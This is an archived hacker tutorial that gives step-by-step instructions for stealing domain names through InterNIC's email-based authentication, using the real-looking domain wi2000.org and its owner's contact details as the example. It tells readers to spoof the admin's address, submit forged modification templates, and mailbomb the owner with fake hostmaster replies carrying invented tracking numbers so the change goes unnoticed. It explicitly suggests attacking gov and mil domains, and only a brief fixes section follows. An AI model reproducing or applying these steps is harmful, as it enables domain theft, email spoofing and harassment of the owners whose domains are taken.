|
|
::::::::: :::::::: ::::::::: ::::::::::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+
+#++:++#+ +#++:++#++ +#++:++#: :#::+::#
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+# #+#
######### ######## ### ### ###
http://old.bsrf.org.uk/tutorials/%20http://www.bsrf.org.uk
_____________________________
______________________I Topic: I_____________________
\ I I /
\ HTML by: I A Flaw in InterNIC I Written by: /
> I Authentication Scheme I <
/ Martin L. I_____________________________I Lucifer Mirza \
/___________________________> <_________________________\ |
The below mentioned technique involves a planned step by step way of stealing
different sorts of com/net/org/gov/mil domain names.
Tools:
Intructions:
As an example for this
advisory, I will take the domain name wi2000.org. Go to networksolutions.com and
click on the link that says 'Who Is.' Now enter the domain name (wi2000.org in
this case) in the search field and click on the 'Search' button. This would show
you the WhoIs information as shown below
Domain Name: WI2000.ORG
Administrative Contact:
MICKE, ANDERSSON (AMM367)
HACKEDINDUSTRIES@HOTMAIL.COM
545326-3445 (FAX) 545326-3445
Technical
Contact, Zone Contact:
Jason, Berresford (BJE41)
jasonb@MOUNTAINCABLE.NET
1-(905)-765-5212
Billing
Contact:
MICKE, ANDERSSON (AMM367)
HACKEDINDUSTRIES@HOTMAIL.COM
545326-3445 (FAX) 545326-3445
Record last updated on 22-Jan-2000.
Record created on
19-Dec-1999.
Database last updated on 3-Feb-2000 14:29:53 EST.
Domain servers in listed order:
NS1.CAN-HOST.COM 24.215.1.6
NS2.MOUNTAINCABLE.NET 24.215.0.12
Now you have two choices here:
-01> Either you could take full control of the domain by changing the Administrator's handle information.
OR
-02> You could simply point the domain to another host and let it recover in time by itself.
The first approach is very aggressive and could be hazardous if you are going
for gov or mil domain names so I recommend second approach for gov and mil
domains.
Intiating the First
Attack:
Let me first explain the InterNIC authentication
system in case most of you would be the readers who do not have their own domain
names. The problem with InterNIC authentication is that they do NOT send a
confirmation email if the request is sent from the same email as the person
owning the contact or the domain name itself! Therefore, utilizing this flaw one
could spoof anyone's email address and change any domain name's information.
Although, a confirmation is required from the person to whom the domain is about
to be transferred; and that shouldn't be too hard as it would your own email
address ;-)
Here's a step by step procedure:
******************* Please DO NOT REMOVE Version Number **********************
Contact Version Number: 1.0
**************** Please see attached detailed instructions *******************
| Authorization | ||
| 0a. | (N)ew (M)odify (D)elete.: | Modify |
| 0b. | Auth Scheme.............: | MAIL-FROM |
| 0c. | Auth Info...............: | |
| Contact Information | ||
| 1a. | NIC Handle..............: | AMM367 |
| 1b. | (I)ndividual (R)ole.....: | Individual |
| 1c. | Name....................: | MICKE, ANDERSSON |
| 1d. | Organization Name.......: | WI2000 |
| 1e. | Street Address..........: | BLIXERED 1 |
| 1f. | City....................: | GOTEBORG |
| 1g. | State...................: | LILLA EDET |
| 1h. | Postal Code.............: | 46394 |
| 1i. | Country.................: | SE |
| 1j. | Phone Number............: | 545326-3445 |
| 1k. | Fax Number..............: | 545326-3445 |
| 1l. | E-Mailbox...............: | dd@doom.com |
| Notify Information | ||
| 2a. | Notify Updates..........: | AFTER-UPDATE |
| 2b. | Notify Use..............: | AFTER-USE |
| Authentication | ||
| 3a. | Auth Scheme.............: | MAIL-FROM |
| 3b. | Auth Info...............: | HACKEDINDUSTRIES@HOTMAIL.COM |
| 3c. | Public (Y/N)............: | NO |
Subject: [NIC-000128.4r50] Your Mail
This is an automatic reply to acknowledge that your message has been
received by hostmaster@networksolutions.com. This acknowledgement is "NOT" a
confirmation that your request has been processed. You will be notified when it
has been completed.
If you should have need to correspond with us regarding this request, please include the tracking number [NIC-000128.4r50] in the subject. The easiest way to do this is simply to reply to this message.
If you have not already done so, please come and visit our site via www browser or ftp and pick-up the latest domain template or review the Domain Name Registration Service Agreement at the URL's:
Domain Name Registration Service Agreement http://www.networksolutions.com/legal/service-agreement.html Domain Name Registration Template ftp://www.networksolutions.com/templates/domain-template.txt
Regards,
Network Solutions Registration Services
***********************************************
***********************************************
IMPORTANT
INFORMATION
***********************************************
On January
15, 2000, Network Solutions introduced Service Agreement, Version 6.0. All
versions of the Service Agreement template will continue to be accepted and
processed until January 31, 2000. On and after February 1, 2000, please use the
Network Solutions Service Agreement, Version 6.0 template located at ftp://www.networksolutions.com/templates/domain-template.txt
for all template requests.
The terms and conditions of the Service Agreement are available on our Web
site at http://www.networksolutions.com/legal/service-agreement.html.
************************************************
The zone files, which make the Internet work, are normally updated twice daily, 7 days a week at 5:00 AM and 5:00 PM U.S. Eastern Standard Time. Requests that are completed before these times will be included in that 12-hour zone file update and will normally begin to take effect within 5-6 hours.
Should you wish to modify or delete an existing domain name registration, you can do so online, using our Service Agreement. You can change the registrant’s address, replace a contact/agent with a different contact/agent, or change primary and/or secondary name server information.
To update information about an existing contact, such as postal address, e-mail address or telephone number, complete and submit the Contact Form to hostmaster@internic.net. This form is available on our Web site at http://www.networksolutions.com/
To register or update information about a name server, complete and submit the Host Form to hostmaster@internic.net. This form is also available on our Web site.
Network Solutions Registration Services e-mail: help@networksolutions.com
_______________________________________________________________________
You should now be thinking that this message could get you in trouble but
there is a way of getting rid of this trouble. Here you'll use your mailbomber
to mailbomb the guy with 20-30 similar messages if you want your attack to be
successful. The person would see 35 messages from the same address and therefore
would delete all of them and you'd probably be safe. If he 'would' email someone
then he would probably reply to the wrong tracking number. In the above case,
the tracking number is [NIC-000128.4r50]. OK, here another hard part. You have
to open your notepad and generate similar numbers actually come up with them.
You should NEVER mailbomb the person with the same tracking number. What I mean
is that you should never send more than one emails to him from [NIC-000128.4r50]
in the next email, change the [NIC-000128.4r50] to [NIC-000127.5089] or
something different. Here is a list of some numbers that I generated just to
give you a good idea of how the scheme works.
[NIC-000127.5089]
[NIC-000128.4rg7]
[NIC-000128.523f]
[NIC-000127.53d0]
[NIC-000129.r609]
[NIC-000128.3f6y]
[NIC-000128.5d8t]
[NIC-000127.r509]
[NIC-000128.4r30]
[NIC-000127.d307]
| NOTE: | Remember to change the number at both places. In the subject as well as the email body! |
In the case of wi2000.org you will send the email messages to HACKEDINDUSTRIES@HOTMAIL.COM from hostmaster@internic.net. The message subject and body are already described above.
Stop after you have mailed him/her 10-15 messages! Now it's time to email
hostmaster@networksolutions.com with our fake email as
HACKEDINDUSTRIES@HOTMAIL.COM So again, in this case the message will be sent to
hostmaster@networksolutions.com from HACKEDINDUSTRIES@HOTMAIL.COM with the
following template that we created
above:
______________________________________________________________________________
*******************
Please DO NOT REMOVE Version Number **********************
Contact Version Number: 1.0
**************** Please see attached detailed instructions *******************
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth
Scheme.............: MAIL-FROM
0c. Auth Info...............:
Contact Information
1a. NIC Handle..............: AMM367
1b.
(I)ndividual (R)ole.....: Individual
1c. Name....................: MICKE,
ANDERSSON
1d. Organization Name.......: WI2000
1e. Street
Address..........: BLIXERED 1
1f. City....................: GOTEBORG
1g.
State...................: LILLA EDET
1h. Postal Code.............:
46394
1i. Country.................: SE
1j. Phone Number............:
545326-3445
1k. Fax Number..............: 545326-3445
1l.
E-Mailbox...............: dd@doom.com
Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b.
Notify Use..............: AFTER-USE
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth
Info...............: HACKEDINDUSTRIES@HOTMAIL.COM
3c. Public
(Y/N)............:
NO
________________________________________________________________________________
_____
NOTE:
Do NOT put anything in the Subject!
-----
Just send one email! Do NOT bomb
hostmaster@networksolutions.com with more than one emails!! That's pretty much
it. Now continue to bomb HACKEDINDUSTRIES@HOTMAIL.COM, changing the tracking
number everytime until your 30-35 tracking numbers are used up!
Now all you gotta do it WAIT. After 24 hours you could go and change the
domain information and no one would be there to stop you because now you are the
admin of the domain name!
_____
NOTE: This attack will only work on
domains that have an admin contact different
----- from their technical
contact!
____________________________
Intiating the Second
Attack:
----------------------------
This attack will be successful even
if the technical and admin contact are the
same but the admin of the contact
needs to be kind of stupid to disregard
emails from interNIC as he is also
the technical contact; but this method should
work as it has worked for
me.
The procedure is basically the same apart from the fact that this
time:
- Go to http://www.networksolutions.com/
- Click on the link that
says 'Make Changes.'
- Enter the domain name wi2000.org
- You should be
presented with 2 blue buttons
- Click on the one that says *Expert*
- Next
screen would have a heading 'Select the form that meets your needs'
- Click
on the link that say 'Service Agreement.'
- Now when it asks for email
address, enter your own.
- Now you should see many fields, don't panic!
-
Go to the technical contact and change the handle to freeservers, hypermart
e.t.c.
- Now come to 'Nameserver Information.'
- Change the nameservers to
hypermart or freeserver nameservers.
- If there's anything in the 'Optional
Information' after that then
simply delete them.
- Click on the button
'Submit this form for processing.'
- You are done, the form will be emailed
to your email address.
- When the form arrives in your email, then simply
take this
part:
___________________________________________________________________________________
****
PLEASE DO NOT REMOVE Version Number or any of the information below
when
submitting this template to hostmaster@networksolutions.com. *****
Domain Version Number: 5.0
********* Email completed agreement to hostmaster@networksolutions.com *********
AGREEMENT TO BE BOUND. By applying for a Network Solutions'
service(s)
through our online application process or by applying for and
registering a
domain name as part of our e-mail template application process
or by using
the service(s) provided by Network Solutions under the Service
Agreement,
Version 5.0, you acknowledge that you have read and agree to be
bound by all
terms and conditions of this Agreement and any pertinent rules
or policies
that are or may be published by Network Solutions.
Please find the Network Solutions Service Agreement, Version 5.0 located
at
the URL <a
href="http://www.networksolutions.com/legal/service-agreement.html">
http://www.networksolutions.com/legal/service-agreement.html</a>.
[ URL
<a
href="ftp://www.networksolutions.com">ftp://www.networksolutions.com</a>
]
[11/99]
Authorization
0a. (N)ew (M)odify (D)elete.........: M Name
Registration
0b. Auth Scheme.....................: MAIL-FROM
0c. Auth
Info.......................:
1. Comments........................:
2. Complete Domain Name............: wi2000.org
Organization Using Domain Name
3a. Organization Name................:
WI2000
3b. Street Address..................: Blixered 1
3c.
City............................: Goteborg
3d.
State...........................: Lila Edet
3e. Postal
Code.....................: 46394
3f. Country.........................: SE
Administrative Contact
4a. NIC Handle (if known)...........: AMM367
4b.
(I)ndividual (R)ole?............: Individual
4c. Name (Last,
First)..............:
4d. Organization Name...............:
4e. Street
Address..................:
4f. City............................:
4g.
State...........................:
4h. Postal
Code.....................:
4i. Country.........................:
4j. Phone
Number....................:
4k. Fax Number......................:
4l.
E-Mailbox.......................:
Technical Contact
5a. NIC Handle (if known)...........: BJE41
5b.
(I)ndividual (R)ole?............: Individual
5c. Name(Last,
First)...............:
5d. Organization Name...............:
5e. Street
Address..................:
5f. City............................:
5g.
State...........................:
5h. Postal
Code.....................:
5i. Country.........................:
5j. Phone
Number....................:
5k. Fax Number......................:
5l.
E-Mailbox.......................:
Billing Contact
6a. NIC Handle (if known)...........: AMM367
6b.
(I)ndividual (R)ole?............: Individual
6c. Name (Last,
First)..............:
6d. Organization Name...............:
6e. Street
Address..................:
6f. City............................:
6g.
State...........................:
6h. Postal
Code.....................:
6i. Country.........................:
6j. Phone
Number....................:
6k. Fax Number......................:
6l.
E-Mailbox.......................:
Prime Name Server
7a. Primary Server Hostname.........:
NS1.CAN-HOST.COM
7b. Primary Server Netaddress.......: 24.215.1.6
Secondary Name Server(s)
8a. Secondary Server Hostname.......:
NS2.MOUNTAINCABLE.NET
8b. Secondary Server Netaddress.....: 24.215.0.12
END OF AGREEMENT
For instructions, please refer
to:
"http://www.networksolutions.com/help/inst-mod.html"
____________________________________________________________________________________
- Now launch your anonymous remailer or mailbomber.
- From: the domain
admin (HACKEDINDUSTRIES@HOTMAIL.COM in this case).
- To:
hostmaster@networksolutions.com
- Subject: (do not enter any subject, leave
the field blank!)
- Body: the template you created above.
- You are ready
to go but before you send this email to InterNIC,
remember to bomb
HACKEDINDUSTRIES@HOTMAIL.COM with similar emails
but different tracking
numbers as we did in the first procedure.
- After sending 10-20 emails, send
the above template to InterNIC.
- Continue bombing your 40 messages. Remember
to generate 40-50
tracking numbers.
- This is basically it.
- The
domain would be transferred to freeservers or hypermart
and then you could
simply activate it from there on your own email
address. Remember to use a
fake email.
________________________
Nameservers and
Handles:
------------------------
Freeservers Technical Handle:
FS4394
Primary Nameserver: NS3.FREESERVERS.COM
Primary Nameserver IP
Address: 209.210.67.153
Secondary Nameserver:
NS4.FREESERVERS.COM
Secondary Nameserver IP Address: 209.210.67.154
Hypermart Technical Handle: DA3706-ORG
Primary Nameserver:
NS1.HYPERMART.NET
Primary Nameserver IP Address: 206.253.222.65
Secondary
Nameserver: NS2.HYPERMART.NET
Secondary Nameserver IP Address:
206.253.222.66
_______________
Possible Fixes:
---------------
As you have seen,
InterNIC does not use the tracking number system too
efficiently. Possible
fixes would certainly be a confirmation email to
the admin contact 'with' a
tracking number. NOT the email saying 'Your request
is being processed' but
a confirmation email which would ask, 'Do you agree
with this request?' even
if it has been sent from the same email address as admin's!
Tracking numbers
could be easily generated and the attacks I have mentioned
above aren't too
hard for a script kiddie with a canned bomber.